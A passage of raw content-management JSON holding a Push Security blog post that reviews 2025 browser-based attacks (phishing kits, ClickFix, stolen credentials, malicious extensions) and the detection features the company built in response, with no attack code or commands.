IB2",{"sys":23830,"__typename":5345,"title":23831,"caption":23832,"layoutMode":118,"file":23833},{"id":3327},"Malicious browser extension detection event including install path","Malicious browser extension detection event",{"url":23834,"width":23835,"height":23836},"https://images.ctfassets.net/y1cdw1ablpvd/2p1cdetW36dOixy4kRIhn0/2298cef9060ae451780d359896588a39/malicious_extension_detection_slideout.png",1433,810,{"sys":23838,"__typename":15269,"type":15270,"ctaText":23839,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":23840},{"id":3492},"Join Push Security Field CTO Mark Orlando on the 11th March for a teardown of malicious browser extension functionality, and what security teams can do about this growing threat.","https://pushsecurity.com/webinar/browser-extension-attacks",{"sys":23842,"__typename":5345,"title":23843,"caption":23843,"layoutMode":118,"file":23844},{"id":3587},"Browser extension permission filtering",{"url":23845,"width":5399,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/297Zj9KN9kGGkSXVK6zWiG/2b4d559fe5fec1e067e602edae889be0/Browser_extension_permission_filtering__2_.gif",{"sys":23847,"__typename":5311,"content":23848,"name":23859,"title":118},{"id":3593},{"json":23849},{"data":23850,"content":23851,"nodeType":165},{},[23852],{"data":23853,"content":23854,"nodeType":178},{},[23855],{"data":23856,"marks":23857,"value":23858,"nodeType":173},{},[],"Pretty much every extension has permissions that could be considered risky and exploited by an attacker, so permissions alone are not a great benchmark for whether it should be allowed or not. But extensive permissions plus an unverified publisher or a recent change in ownership might be enough to prioritize an extension for removal.","Managing Extensions Guide: IB4",{"sys":23861,"__typename":5311,"content":23862,"name":23873,"title":118},{"id":3651},{"json":23863},{"nodeType":165,"data":23864,"content":23865},{},[23866],{"nodeType":178,"data":23867,"content":23868},{},[23869],{"nodeType":173,"value":23870,"marks":23871,"data":23872},"If you plan to restrict the extensions that your employees can install and run, you’ll need to create a workflow where employees can request new extensions and the number of extensions that would need to be reviewed. This is something that you should be able to create using your ITSM tooling in the same way that any other software is requested. ",[],{},"Managing Extensions Guide: IB5",{"sys":23875,"__typename":5345,"title":23876,"caption":23877,"layoutMode":118,"file":23878},{"id":3679},"This extension is not approved for business use","Employees will see a customizable block screen when trying to use extensions that are not approved",{"url":23879,"width":23880,"height":23881},"https://images.ctfassets.net/y1cdw1ablpvd/2hFpE2X60adttS6vAtyUIO/963e14eb2899163f583e7342db3f0650/image5.png",1440,744,{"sys":23883,"__typename":5345,"title":23884,"caption":118,"layoutMode":118,"file":23885},{"id":3802},"GitLab malicious extensions quote",{"url":23886,"width":5358,"height":23887},"https://images.ctfassets.net/y1cdw1ablpvd/xod7FhG6yTK1iTePEKahw/7f30d66068fd2e36648ed9bab35920c4/image7.png",1125,{"sys":23889,"__typename":5345,"title":23890,"caption":118,"layoutMode":118,"file":23891},{"id":3867},"Disable browser extension syncing in Google Workspace",{"url":23892,"width":23893,"height":23894},"https://images.ctfassets.net/y1cdw1ablpvd/5YSw6EyTZgcx36eXwwdrBQ/8b4ea60632667f07bb6d11841aa8a86c/image4.png",1256,662,{"sys":23896,"__typename":5345,"title":23897,"caption":23897,"layoutMode":118,"file":23898},{"id":3887},"See browser profile across all browsers using Push",{"url":23899,"width":5365,"height":5366},"https://images.ctfassets.net/y1cdw1ablpvd/3eWEtmkukL5JzeArcty88m/22aec4f6ce2ef0d309eab015e1efe493/image1.png",{"items":23901},[23902,25199,25598],{"__typename":1528,"sys":23903,"content":23905,"title":25185,"synopsis":25186,"hashTags":118,"publishedDate":25187,"slug":25188,"tagsCollection":25189,"authorsCollection":25195},{"id":23904},"37KWV8V5L3aNZBSx6JMd0Z",{"json":23906},{"data":23907,"content":23908,"nodeType":165},{},[23909,23916,23923,23984,23991,24060,24066,24073,24080,24083,24090,24097,24104,24206,24225,24232,24274,24281,24288,24295,24328,24334,24365,24370,24377,24384,24417,24437,24440,24447,24453,24482,24489,24496,24503,24509,24516,24522,24537,24580,24585,24604,24607,24614,24620,24640,24647,24676,24696,24702,24723,24730,24737,24797,24804,24810,24824,24838,24858,24864,24885,24892,24895,24902,24908,24915,24922,24943,24949,24969,24974,24981,25014,25032,25035,25042,25048,25055,25076,25082,25097,25103,25110,25117,25136,25139,25145,25152,25159],{"data":23910,"content":23911,"nodeType":178},{},[23912],{"data":23913,"marks":23914,"value":23915,"nodeType":173},{},[],"Looking back over the year’s headlines and trending TTPs, it’s clear that 2025 was the year that browser-based account takeover techniques made the leap into the mainstream.",{"data":23917,"content":23918,"nodeType":178},{},[23919],{"data":23920,"marks":23921,"value":23922,"nodeType":173},{},[],"A few stats tell the story …",{"data":23924,"content":23925,"nodeType":250},{},[23926,23945,23964],{"data":23927,"content":23928,"nodeType":254},{},[23929],{"data":23930,"content":23931,"nodeType":178},{},[23932,23936,23942],{"data":23933,"marks":23934,"value":23935,"nodeType":173},{},[],"Identity-based attacks surged by 32% over the last year, and 97% of identity attacks were password-based, driven by a combination of credential leaks and infostealer malware. (",{"data":23937,"content":23938,"nodeType":186},{"uri":1252},[23939],{"data":23940,"marks":23941,"value":1255,"nodeType":173},{},[],{"data":23943,"marks":23944,"value":1260,"nodeType":173},{},[],{"data":23946,"content":23947,"nodeType":254},{},[23948],{"data":23949,"content":23950,"nodeType":178},{},[23951,23955,23961],{"data":23952,"marks":23953,"value":23954,"nodeType":173},{},[],"ClickFix was the most common initial point of access for adversaries in the past year, accounting for a whopping 47% of observed attacks. (",{"data":23956,"content":23957,"nodeType":186},{"uri":1252},[23958],{"data":23959,"marks":23960,"value":1255,"nodeType":173},{},[],{"data":23962,"marks":23963,"value":1260,"nodeType":173},{},[],{"data":23965,"content":23966,"nodeType":254},{},[23967],{"data":23968,"content":23969,"nodeType":178},{},[23970,23974,23981],{"data":23971,"marks":23972,"value":23973,"nodeType":173},{},[],"Pure malware-based attacks declined, as adversaries continued to shift from targeting endpoints to corporate identities. In the last year-plus, 79% of detections were malware-free, up from 40% in 2019. And abuse of valid accounts was responsible for more than one-third of all cloud-related incidents. (",{"data":23975,"content":23976,"nodeType":186},{"uri":1275},[23977],{"data":23978,"marks":23979,"value":23980,"nodeType":173},{},[],"Crowdstrike",{"data":23982,"marks":23983,"value":1260,"nodeType":173},{},[],{"data":23985,"content":23986,"nodeType":178},{},[23987],{"data":23988,"marks":23989,"value":23990,"nodeType":173},{},[],"… and so do the headlines from 2025:",{"data":23992,"content":23993,"nodeType":250},{},[23994,24013,24041],{"data":23995,"content":23996,"nodeType":254},{},[23997],{"data":23998,"content":23999,"nodeType":178},{},[24000,24004,24009],{"data":24001,"marks":24002,"value":24003,"nodeType":173},{},[],"Attackers stole over ",{"data":24005,"marks":24006,"value":24008,"nodeType":173},{},[24007],{"type":370},"1.5 billion records",{"data":24010,"marks":24011,"value":24012,"nodeType":173},{},[]," from an estimated 1,000+ Salesforce tenants by exploiting integrations (Salesloft, Gainsight), phishing credentials, and by tricking users into installing a malicious OAuth app.",{"data":24014,"content":24015,"nodeType":254},{},[24016],{"data":24017,"content":24018,"nodeType":178},{},[24019,24023,24028,24032,24037],{"data":24020,"marks":24021,"value":24022,"nodeType":173},{},[],"Marks & Spencer was hit with a help desk scam that led to a compromised Microsoft Entra account, followed by a ransomware deployment resulting in months of disruption, ",{"data":24024,"marks":24025,"value":24027,"nodeType":173},{},[24026],{"type":370},"$400M",{"data":24029,"marks":24030,"value":24031,"nodeType":173},{},[]," in lost profits, and around ",{"data":24033,"marks":24034,"value":24036,"nodeType":173},{},[24035],{"type":370},"$1.3B",{"data":24038,"marks":24039,"value":24040,"nodeType":173},{},[]," wiped off their stock market valuation at one stage.",{"data":24042,"content":24043,"nodeType":254},{},[24044],{"data":24045,"content":24046,"nodeType":178},{},[24047,24051,24056],{"data":24048,"marks":24049,"value":24050,"nodeType":173},{},[],"Jaguar Land Rover was compromised via highly privileged admin accounts — another help desk scam targeting workforce credentials for initial access — resulting in months of disruption that led the UK government to underwrite a ",{"data":24052,"marks":24053,"value":24055,"nodeType":173},{},[24054],{"type":370},"$1.5B",{"data":24057,"marks":24058,"value":24059,"nodeType":173},{},[]," loan to alleviate the supply chain impact. This was the most economically consequential cyber attack yet recorded in a G7 economy.",{"data":24061,"content":24065,"nodeType":312},{"target":24062},{"sys":24063},{"id":24064,"type":317,"linkType":318},"v5YYnjP2NViOh6Ucxp2Fe",[],{"data":24067,"content":24068,"nodeType":178},{},[24069],{"data":24070,"marks":24071,"value":24072,"nodeType":173},{},[],"At Push, we’ve been closely tracking the evolution of browser-based attacks. Looking back at 2025, we’ve seen a notable increase in the sophistication and frequency of modern attack techniques methods like ClickFix, commodified phish kits that bypass MFA, malicious browser extensions, and many more. (Writing phish kit teardowns for the Push blog is practically a full-time job now.)",{"data":24074,"content":24075,"nodeType":178},{},[24076],{"data":24077,"marks":24078,"value":24079,"nodeType":173},{},[],"In this article, we’ll take a look at how real-world attacks and our own research drove the features we delivered for Push customers this year to take the fight to adversaries.",{"data":24081,"content":24082,"nodeType":231},{},[],{"data":24084,"content":24085,"nodeType":169},{},[24086],{"data":24087,"marks":24088,"value":24089,"nodeType":173},{},[],"Detecting and blocking increasingly sophisticated phishing-as-a-service tools",{"data":24091,"content":24092,"nodeType":235},{},[24093],{"data":24094,"marks":24095,"value":24096,"nodeType":173},{},[],"What happened",{"data":24098,"content":24099,"nodeType":178},{},[24100],{"data":24101,"marks":24102,"value":24103,"nodeType":173},{},[],"The current state of the art for phishing centers on three core developments:",{"data":24105,"content":24106,"nodeType":250},{},[24107,24136,24177],{"data":24108,"content":24109,"nodeType":254},{},[24110],{"data":24111,"content":24112,"nodeType":178},{},[24113,24118,24122,24132],{"data":24114,"marks":24115,"value":24117,"nodeType":173},{},[24116],{"type":370},"Detection evasion: ",{"data":24119,"marks":24120,"value":24121,"nodeType":173},{},[],"Adversaries demonstrated a ",{"data":24123,"content":24127,"nodeType":1698},{"target":24124},{"sys":24125},{"id":24126,"type":317,"linkType":318},"4XZ6qCr8pjJvcD7hi09x2Y",[24128],{"data":24129,"marks":24130,"value":24131,"nodeType":173},{},[],"creative array of approaches",{"data":24133,"marks":24134,"value":24135,"nodeType":173},{},[]," this year to hide their intentions from end-users and defenders, using methods such as sending phishing emails from legitimate services; serving phishing pages via malvertising and SEO poisoning; and obfuscating URLs. More sophisticated techniques used page-level obfuscation, cross-domain iframes, single-use links, and legitimate OIDC logins to evade detection and analysis from traditional tools.",{"data":24137,"content":24138,"nodeType":254},{},[24139],{"data":24140,"content":24141,"nodeType":178},{},[24142,24147,24151,24160,24164,24174],{"data":24143,"marks":24144,"value":24146,"nodeType":173},{},[24145],{"type":370},"Multi-channel delivery of lures:",{"data":24148,"marks":24149,"value":24150,"nodeType":173},{},[]," Adversaries proved the truism of “phishing doesn’t just happen in the mailbox” this year by increasing their observed use of ",{"data":24152,"content":24156,"nodeType":1698},{"target":24153},{"sys":24154},{"id":24155,"type":317,"linkType":318},"72lLmy0CXnOp3LWOdcUguX",[24157],{"data":24158,"marks":24159,"value":8046,"nodeType":173},{},[],{"data":24161,"marks":24162,"value":24163,"nodeType":173},{},[]," and SEO poisoning — techniques that place malicious pages within trusted contexts like the Google search engine results page — as well as the use of social media services like LinkedIn to ",{"data":24165,"content":24169,"nodeType":1698},{"target":24166},{"sys":24167},{"id":24168,"type":317,"linkType":318},"2yEhB2gFC2TJDLquVP3cg2",[24170],{"data":24171,"marks":24172,"value":24173,"nodeType":173},{},[],"deliver phishing lures",{"data":24175,"marks":24176,"value":2340,"nodeType":173},{},[],{"data":24178,"content":24179,"nodeType":254},{},[24180],{"data":24181,"content":24182,"nodeType":178},{},[24183,24188,24192,24202],{"data":24184,"marks":24185,"value":24187,"nodeType":173},{},[24186],{"type":370},"Commodification of phishing toolkits:",{"data":24189,"marks":24190,"value":24191,"nodeType":173},{},[]," Phishing-as-a-service (PhaaS) kits have become another SaaS with their own supply chain, including developers of malicious tooling, operators who run the campaigns, and brokers who sell stolen credentials and tokens. The incentives for attackers are clear: quick ROI from targeting workforce identities, and out-of-the-box tools that make it easier to efficiently spin up new campaigns or try new techniques. As with any SaaS offering, the customer (attackers, in this case) benefits from rapid innovations they didn’t have to build. We saw this recently with the ",{"data":24193,"content":24197,"nodeType":1698},{"target":24194},{"sys":24195},{"id":24196,"type":317,"linkType":318},"6QLonRmBzbj9h88Y7jD0LU",[24198],{"data":24199,"marks":24200,"value":24201,"nodeType":173},{},[],"addition of a browser-in-the-browser (BitB) technique",{"data":24203,"marks":24204,"value":24205,"nodeType":173},{},[]," to the phish kit Sneaky2FA — a change that makes it even more effective.",{"data":24207,"content":24208,"nodeType":178},{},[24209,24213,24221],{"data":24210,"marks":24211,"value":24212,"nodeType":173},{},[],"In 2025, Push researchers tracked how each of these developments expanded in scope and sophistication. Check out our ",{"data":24214,"content":24216,"nodeType":186},{"uri":24215},"https://pushsecurity.github.io/phishing-techniques/",[24217],{"data":24218,"marks":24219,"value":24220,"nodeType":173},{},[],"phishing detection evasion techniques matrix",{"data":24222,"marks":24223,"value":24224,"nodeType":173},{},[]," on Github for more detail. ",{"data":24226,"content":24227,"nodeType":178},{},[24228],{"data":24229,"marks":24230,"value":24231,"nodeType":173},{},[],"The takeaways for security teams?",{"data":24233,"content":24234,"nodeType":250},{},[24235,24245,24264],{"data":24236,"content":24237,"nodeType":254},{},[24238],{"data":24239,"content":24240,"nodeType":178},{},[24241],{"data":24242,"marks":24243,"value":24244,"nodeType":173},{},[],"You can’t block your way to safety when adversaries are using the same legitimate apps that your employees use.",{"data":24246,"content":24247,"nodeType":254},{},[24248],{"data":24249,"content":24250,"nodeType":178},{},[24251,24255,24260],{"data":24252,"marks":24253,"value":24254,"nodeType":173},{},[],"Similarly, while end-user training is important, it’s not reasonable to expect employees to know when a SharePoint document link is malicious when it looks identical to the ones they trust every day — because adversaries ",{"data":24256,"marks":24257,"value":24259,"nodeType":173},{},[24258],{"type":1646},"are using the legitimate service",{"data":24261,"marks":24262,"value":24263,"nodeType":173},{},[],". Push researchers have observed the abuse of hundreds of legitimate services in phishing attacks this year.",{"data":24265,"content":24266,"nodeType":254},{},[24267],{"data":24268,"content":24269,"nodeType":178},{},[24270],{"data":24271,"marks":24272,"value":24273,"nodeType":173},{},[],"Security solutions need to be able to analyze real-time context and behavior, not rely solely on inferences from secondary characteristics like domain reputation.",{"data":24275,"content":24276,"nodeType":178},{},[24277],{"data":24278,"marks":24279,"value":24280,"nodeType":173},{},[],"Here's what we built to help defend organizations.",{"data":24282,"content":24283,"nodeType":235},{},[24284],{"data":24285,"marks":24286,"value":24287,"nodeType":173},{},[],"What we built",{"data":24289,"content":24290,"nodeType":178},{},[24291],{"data":24292,"marks":24293,"value":24294,"nodeType":173},{},[],"The feature we built in 2025 that gave us unique insight into these TTPs is Push’s Detections capability. With Detections, you can:",{"data":24296,"content":24297,"nodeType":250},{},[24298,24308,24318],{"data":24299,"content":24300,"nodeType":254},{},[24301],{"data":24302,"content":24303,"nodeType":178},{},[24304],{"data":24305,"marks":24306,"value":24307,"nodeType":173},{},[],"Get alerted when Push detects a browser-based attack, and see how the Push agent responded to block the attack. The platform provides a front-end view for quick triage, and you can also pipe the detection events to your SIEM or other platform of choice.",{"data":24309,"content":24310,"nodeType":254},{},[24311],{"data":24312,"content":24313,"nodeType":178},{},[24314],{"data":24315,"marks":24316,"value":24317,"nodeType":173},{},[],"Review a timeline of the incident: Where a phishing link originated; whether a user entered their credentials; what kind of phishkit was detected; and how Push responded (configurable based on your environment).",{"data":24319,"content":24320,"nodeType":254},{},[24321],{"data":24322,"content":24323,"nodeType":178},{},[24324],{"data":24325,"marks":24326,"value":24327,"nodeType":173},{},[],"Get actionable telemetry and metadata about an incident, including a screenshot of the malicious page to see exactly what the user saw; intel about the involved domains, including when they were registered and if they’ve been scanned by urlscan before; and the blast radius of an attack, including other apps that shared a password with the potentially compromised account",{"data":24329,"content":24333,"nodeType":312},{"target":24330},{"sys":24331},{"id":24332,"type":317,"linkType":318},"5dygPaG3Gfw4Yeicffv6tV",[],{"data":24335,"content":24336,"nodeType":178},{},[24337,24341,24346,24349,24354,24357,24361],{"data":24338,"marks":24339,"value":24340,"nodeType":173},{},[],"This telemetry — combined with Push’s out-of-the-box controls like ",{"data":24342,"marks":24343,"value":24345,"nodeType":173},{},[24344],{"type":370},"Phishing tool detection",{"data":24347,"marks":24348,"value":2936,"nodeType":173},{},[],{"data":24350,"marks":24351,"value":24353,"nodeType":173},{},[24352],{"type":370},"Cloned login page detection",{"data":24355,"marks":24356,"value":9534,"nodeType":173},{},[],{"data":24358,"marks":24359,"value":18640,"nodeType":173},{},[24360],{"type":370},{"data":24362,"marks":24363,"value":24364,"nodeType":173},{},[]," (aka ClickFix detection) — give you a seat on the user’s side of the equation, capturing real-time information about what users did and the TTPs of an attack so you can investigate and respond efficiently and confidently.",{"data":24366,"content":24369,"nodeType":312},{"target":24367},{"sys":24368},{"id":18898,"type":317,"linkType":318},[],{"data":24371,"content":24372,"nodeType":178},{},[24373],{"data":24374,"marks":24375,"value":24376,"nodeType":173},{},[],"With the visibility provided by this telemetry across Push’s install base, our R&D and Product teams have rapidly iterated all year on our detections to increase coverage and respond quickly to newly identified attack types.",{"data":24378,"content":24379,"nodeType":178},{},[24380],{"data":24381,"marks":24382,"value":24383,"nodeType":173},{},[],"This year, we also released:",{"data":24385,"content":24386,"nodeType":250},{},[24387,24397,24407],{"data":24388,"content":24389,"nodeType":254},{},[24390],{"data":24391,"content":24392,"nodeType":178},{},[24393],{"data":24394,"marks":24395,"value":24396,"nodeType":173},{},[],"Detections for new variants of cloned login pages and AiTM phish kits.",{"data":24398,"content":24399,"nodeType":254},{},[24400],{"data":24401,"content":24402,"nodeType":178},{},[24403],{"data":24404,"marks":24405,"value":24406,"nodeType":173},{},[],"12+ pre-release detections focused on flagging emerging attacker techniques.",{"data":24408,"content":24409,"nodeType":254},{},[24410],{"data":24411,"content":24412,"nodeType":178},{},[24413],{"data":24414,"marks":24415,"value":24416,"nodeType":173},{},[],"7+ first-class SIEM and SOAR integrations, to make it simpler to ingest Push telemetry and operationalize it.",{"data":24418,"content":24419,"nodeType":178},{},[24420,24424,24434],{"data":24421,"marks":24422,"value":24423,"nodeType":173},{},[],"Learn more about Push’s detections features in our ",{"data":24425,"content":24429,"nodeType":1698},{"target":24426},{"sys":24427},{"id":24428,"type":317,"linkType":318},"6OFdfAsoPUECeRAetWvedp",[24430],{"data":24431,"marks":24432,"value":24433,"nodeType":173},{},[],"blog article",{"data":24435,"marks":24436,"value":1477,"nodeType":173},{},[],{"data":24438,"content":24439,"nodeType":231},{},[],{"data":24441,"content":24442,"nodeType":169},{},[24443],{"data":24444,"marks":24445,"value":24446,"nodeType":173},{},[],"Detecting and blocking ClickFix-style malicious copy and paste attacks",{"data":24448,"content":24449,"nodeType":235},{},[24450],{"data":24451,"marks":24452,"value":24096,"nodeType":173},{},[],{"data":24454,"content":24455,"nodeType":178},{},[24456,24460,24467,24471,24478],{"data":24457,"marks":24458,"value":24459,"nodeType":173},{},[],"ClickFix-style attacks left their mark in 2025, quickly becoming one of the most prevalent attack techniques — with ",{"data":24461,"content":24462,"nodeType":186},{"uri":21131},[24463],{"data":24464,"marks":24465,"value":24466,"nodeType":173},{},[],"estimates",{"data":24468,"marks":24469,"value":24470,"nodeType":173},{},[]," of a 400 percent year-over-year increase, and another ",{"data":24472,"content":24473,"nodeType":186},{"uri":21144},[24474],{"data":24475,"marks":24476,"value":24477,"nodeType":173},{},[],"report",{"data":24479,"marks":24480,"value":24481,"nodeType":173},{},[]," documenting a 517 percent growth in just the last 6 months of the year.",{"data":24483,"content":24484,"nodeType":178},{},[24485],{"data":24486,"marks":24487,"value":24488,"nodeType":173},{},[],"What is ClickFix? This attack technique prompts the user to solve some kind of problem or troubleshooting step in the browser — often presented as a CAPTCHA challenge. The key aspect of the attack is that it tricks users into running malicious commands on their device by copying malicious code from the page clipboard and running it locally. (The copy typically occurs  automatically via the page itself, but can also be performed manually by the user.)",{"data":24490,"content":24491,"nodeType":178},{},[24492],{"data":24493,"marks":24494,"value":24495,"nodeType":173},{},[],"These malicious copy and paste attacks are often used to deliver infostealer malware or remote access software, with the attacker’s end goal being stealing session cookies and credentials to facilitate attacks on business apps.",{"data":24497,"content":24498,"nodeType":178},{},[24499],{"data":24500,"marks":24501,"value":24502,"nodeType":173},{},[],"What’s especially challenging about this attack type is that it usually can only be detected after the fact — when a machine is already compromised, or malicious code attempts to execute (if EDR catches it). Even if it is detected, security teams are left flying blind when they try to determine the initial vector for the attack, and which other users might have been targeted.",{"data":24504,"content":24505,"nodeType":235},{},[24506],{"data":24507,"marks":24508,"value":24287,"nodeType":173},{},[],{"data":24510,"content":24511,"nodeType":178},{},[24512],{"data":24513,"marks":24514,"value":24515,"nodeType":173},{},[],"Because of our position in the browser, Push is uniquely positioned to detect and block browser-native attacks like ClickFix and other forms of malicious copy and paste techniques. So that’s what we built.",{"data":24517,"content":24521,"nodeType":312},{"target":24518},{"sys":24519},{"id":24520,"type":317,"linkType":318},"56jVT7dbNqUGiSRTfTCQw2",[],{"data":24523,"content":24524,"nodeType":178},{},[24525,24529,24533],{"data":24526,"marks":24527,"value":24528,"nodeType":173},{},[],"With our ",{"data":24530,"marks":24531,"value":18640,"nodeType":173},{},[24532],{"type":370},{"data":24534,"marks":24535,"value":24536,"nodeType":173},{},[],", you can:",{"data":24538,"content":24539,"nodeType":250},{},[24540,24550,24560,24570],{"data":24541,"content":24542,"nodeType":254},{},[24543],{"data":24544,"content":24545,"nodeType":178},{},[24546],{"data":24547,"marks":24548,"value":24549,"nodeType":173},{},[],"Detect ClickFix-style attacks as soon as they target end-users, regardless of the delivery channel for the lure, or the specifics of the malware type and execution.",{"data":24551,"content":24552,"nodeType":254},{},[24553],{"data":24554,"content":24555,"nodeType":178},{},[24556],{"data":24557,"marks":24558,"value":24559,"nodeType":173},{},[],"Block these attacks before the malicious code is copied to the clipboard.",{"data":24561,"content":24562,"nodeType":254},{},[24563],{"data":24564,"content":24565,"nodeType":178},{},[24566],{"data":24567,"marks":24568,"value":24569,"nodeType":173},{},[],"Safely collect the payload for further investigation by your security team, and replace the clipboard contents with safe text as part of the blocking action.",{"data":24571,"content":24572,"nodeType":254},{},[24573],{"data":24574,"content":24575,"nodeType":178},{},[24576],{"data":24577,"marks":24578,"value":24579,"nodeType":173},{},[],"Capture a detailed timeline of events to see how users were targeted and how the attack unfolded.",{"data":24581,"content":24584,"nodeType":312},{"target":24582},{"sys":24583},{"id":21021,"type":317,"linkType":318},[],{"data":24586,"content":24587,"nodeType":178},{},[24588,24592,24601],{"data":24589,"marks":24590,"value":24591,"nodeType":173},{},[],"Learn more about ClickFix detection in our ",{"data":24593,"content":24596,"nodeType":1698},{"target":24594},{"sys":24595},{"id":2215,"type":317,"linkType":318},[24597],{"data":24598,"marks":24599,"value":24600,"nodeType":173},{},[],"documentation",{"data":24602,"marks":24603,"value":1477,"nodeType":173},{},[],{"data":24605,"content":24606,"nodeType":231},{},[],{"data":24608,"content":24609,"nodeType":169},{},[24610],{"data":24611,"marks":24612,"value":24613,"nodeType":173},{},[],"Getting ahead of breaches tied to stolen credentials and ghost logins",{"data":24615,"content":24616,"nodeType":235},{},[24617],{"data":24618,"marks":24619,"value":24096,"nodeType":173},{},[],{"data":24621,"content":24622,"nodeType":178},{},[24623,24627,24637],{"data":24624,"marks":24625,"value":24626,"nodeType":173},{},[],"Starting in November 2024 and continuing through July 2025, adversaries linked to the HELLCAT threat group compromised Jira tenants belonging to 10 organizations using ",{"data":24628,"content":24632,"nodeType":1698},{"target":24629},{"sys":24630},{"id":24631,"type":317,"linkType":318},"gANCbeL9AnxmbGAE5HhyG",[24633],{"data":24634,"marks":24635,"value":24636,"nodeType":173},{},[],"stolen credentials",{"data":24638,"marks":24639,"value":2340,"nodeType":173},{},[],{"data":24641,"content":24642,"nodeType":178},{},[24643],{"data":24644,"marks":24645,"value":24646,"nodeType":173},{},[],"Business-critical applications like Jira are prime targets for attackers, who in this case dumped valuable data and then held it for ransom (or sold it on criminal marketplaces). Of course, this isn’t just a problem for Jira — data from Push’s initial deployment into customer environments shows that lots of critical apps lack basic controls like strong passwords and MFA.",{"data":24648,"content":24649,"nodeType":178},{},[24650,24654,24662,24666,24672],{"data":24651,"marks":24652,"value":24653,"nodeType":173},{},[],"The evolving threat group known as ",{"data":24655,"content":24658,"nodeType":1698},{"target":24656},{"sys":24657},{"id":519,"type":317,"linkType":318},[24659],{"data":24660,"marks":24661,"value":6811,"nodeType":173},{},[],{"data":24663,"marks":24664,"value":24665,"nodeType":173},{},[]," has also embraced the use of stolen creds, session cookies, and unprotected local account logins — aka ",{"data":24667,"content":24668,"nodeType":186},{"uri":832},[24669],{"data":24670,"marks":24671,"value":835,"nodeType":173},{},[],{"data":24673,"marks":24674,"value":24675,"nodeType":173},{},[]," — to compromise large organizations.",{"data":24677,"content":24678,"nodeType":178},{},[24679,24683,24692],{"data":24680,"marks":24681,"value":24682,"nodeType":173},{},[],"In 2025, Red Hat’s GitLab instance was compromised due to a local account that essentially provided a backdoor to an otherwise secure and SSO-connected account — an attack reminiscent of the ",{"data":24684,"content":24687,"nodeType":1698},{"target":24685},{"sys":24686},{"id":3979,"type":317,"linkType":318},[24688],{"data":24689,"marks":24690,"value":24691,"nodeType":173},{},[],"2024 Snowflake breach",{"data":24693,"marks":24694,"value":24695,"nodeType":173},{},[],", which targeted local logins that lacked MFA.",{"data":24697,"content":24698,"nodeType":235},{},[24699],{"data":24700,"marks":24701,"value":24287,"nodeType":173},{},[],{"data":24703,"content":24704,"nodeType":178},{},[24705,24709,24719],{"data":24706,"marks":24707,"value":24708,"nodeType":173},{},[],"Push already provided the ability to detect stolen credentials being actively used by employees in your organization with our ",{"data":24710,"content":24714,"nodeType":1698},{"target":24711},{"sys":24712},{"id":24713,"type":317,"linkType":318},"6vCr4d3R1XA1E8dU883l7N",[24715],{"data":24716,"marks":24717,"value":24718,"nodeType":173},{},[],"Stolen credential detection control",{"data":24720,"marks":24721,"value":24722,"nodeType":173},{},[],". This provides an early-warning signal when Push finds a match between credentials for sale on criminal forums with those still being used by your employees, reducing some 99.5% of false positives we usually see with TI feed data.",{"data":24724,"content":24725,"nodeType":178},{},[24726],{"data":24727,"marks":24728,"value":24729,"nodeType":173},{},[],"With Push, you can also identify where employees are logging in with passwords on apps that otherwise should be using SAML, OIDC, or some other federated mechanism — aka the ghost login vulnerability.",{"data":24731,"content":24732,"nodeType":178},{},[24733],{"data":24734,"marks":24735,"value":24736,"nodeType":173},{},[],"This year, we made it easier for security teams to enforce two security fundamentals that help harden accounts and reduce the risk of ATO, even on unmanaged apps:",{"data":24738,"content":24739,"nodeType":250},{},[24740,24769],{"data":24741,"content":24742,"nodeType":254},{},[24743],{"data":24744,"content":24745,"nodeType":178},{},[24746,24751,24755,24765],{"data":24747,"marks":24748,"value":24750,"nodeType":173},{},[24749],{"type":370},"Strong password enforcement:",{"data":24752,"marks":24753,"value":24754,"nodeType":173},{},[]," With this control, you can prompt end-users to ",{"data":24756,"content":24760,"nodeType":1698},{"target":24757},{"sys":24758},{"id":24759,"type":317,"linkType":318},"5aB5x5VXrMv7PDmH0iiK0c",[24761],{"data":24762,"marks":24763,"value":24764,"nodeType":173},{},[],"fix an insecure password",{"data":24766,"marks":24767,"value":24768,"nodeType":173},{},[]," on all your workforce apps, even the ones you don’t centrally manage. ",{"data":24770,"content":24771,"nodeType":254},{},[24772],{"data":24773,"content":24774,"nodeType":178},{},[24775,24780,24783,24793],{"data":24776,"marks":24777,"value":24779,"nodeType":173},{},[24778],{"type":370},"MFA enforcement:",{"data":24781,"marks":24782,"value":24754,"nodeType":173},{},[],{"data":24784,"content":24788,"nodeType":1698},{"target":24785},{"sys":24786},{"id":24787,"type":317,"linkType":318},"wikyVxlHwKUOKM9xo19eP",[24789],{"data":24790,"marks":24791,"value":24792,"nodeType":173},{},[],"register for MFA",{"data":24794,"marks":24795,"value":24796,"nodeType":173},{},[]," where Push detects it’s missing — again, even on unmanaged apps.",{"data":24798,"content":24799,"nodeType":178},{},[24800],{"data":24801,"marks":24802,"value":24803,"nodeType":173},{},[],"Both of these controls use in-browser banners to provide point-in-time guidance to users when they’re most likely to see it and act on it.",{"data":24805,"content":24809,"nodeType":312},{"target":24806},{"sys":24807},{"id":24808,"type":317,"linkType":318},"3XH0hnnhcZNI47PhdiD4q0",[],{"data":24811,"content":24812,"nodeType":178},{},[24813,24817,24821],{"data":24814,"marks":24815,"value":24816,"nodeType":173},{},[],"To address the pattern of adversaries moving from targeting hardened core apps such as identity providers to the likes of GitLab, Postman, Jira, and others containing valuable corporate data, we also expanded one of the Push platform’s core security controls called ",{"data":24818,"marks":24819,"value":2600,"nodeType":173},{},[24820],{"type":370},{"data":24822,"marks":24823,"value":1477,"nodeType":173},{},[],{"data":24825,"content":24826,"nodeType":178},{},[24827,24830,24834],{"data":24828,"marks":24829,"value":5039,"nodeType":173},{},[],{"data":24831,"marks":24832,"value":2600,"nodeType":173},{},[24833],{"type":370},{"data":24835,"marks":24836,"value":24837,"nodeType":173},{},[]," control previously could be applied only to IdP passwords, allowing you to essentially “pin” the credential for those systems so that it could never be entered on a phishing page or reused on any other app. ",{"data":24839,"content":24840,"nodeType":178},{},[24841,24845,24854],{"data":24842,"marks":24843,"value":24844,"nodeType":173},{},[],"We expanded that control to allow you to ",{"data":24846,"content":24849,"nodeType":1698},{"target":24847},{"sys":24848},{"id":2405,"type":317,"linkType":318},[24850],{"data":24851,"marks":24852,"value":24853,"nodeType":173},{},[],"protect passwords on any valuable app",{"data":24855,"marks":24856,"value":24857,"nodeType":173},{},[],", preventing account takeover through phished creds and reducing the blast radius of attacks when a compromised account has been reusing passwords on multiple 